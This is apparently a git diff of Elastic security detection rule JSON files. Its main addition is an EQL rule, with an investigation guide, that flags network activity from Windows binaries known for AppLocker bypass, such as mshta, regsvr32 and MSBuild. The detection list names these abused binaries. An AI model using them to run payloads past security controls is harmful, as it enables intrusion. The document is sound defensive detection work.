!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n )\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_109.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_109.json new file mode 100644 index 00000000000..84a4fbba68c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_109.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Network Activity from a Windows System Binary", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n (\n process.name : \"msbuild.exe\" and\n destination.ip != \"127.0.0.1\"\n ) or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n ) and\n /* Localhost, DigiCert and Comodo CA IP addresses */\n not cidrmatch(destination.ip, \"127.0.0.1\", \"192.229.211.108/32\", \"192.229.221.95/32\",\n \"152.195.38.76/32\", \"104.18.14.101/32\")\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1fe3b299-fbb5-4657-a937-1d746f2c711a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + }, + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + } + ] + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "1fe3b299-fbb5-4657-a937-1d746f2c711a_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_100.json b/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_100.json index 1d888baaf47..83fdd95758b 100644 --- a/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_100.json +++ b/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_100.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -62,7 +62,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_101.json b/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_101.json index f63117b5a9b..c7c0468f596 100644 --- a/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_101.json +++ b/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_101.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -61,7 +61,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_104.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_104.json index b280913119e..554208ce793 100644 --- a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_105.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_105.json index e82a12a0207..60d7594b572 100644 --- a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_106.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_106.json index 5fd84a5bdd9..65b5e30447a 100644 --- a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_106.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_107.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_107.json index 50b2aa7d37d..a06241c69bc 100644 --- a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_107.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_108.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_108.json index dcac3f7004c..e21e1533710 100644 --- a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_108.json +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_108.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_104.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_104.json index 4c96a3f46ab..2c48a7b8cdd 100644 --- a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_104.json @@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_105.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_105.json index 6874e047c0c..56707485f51 100644 --- a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_105.json @@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_106.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_106.json index 10fb878d464..11ab15cb66b 100644 --- a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_106.json @@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_107.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_107.json index 1500b99b13d..08acff1afc4 100644 --- a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_107.json @@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL 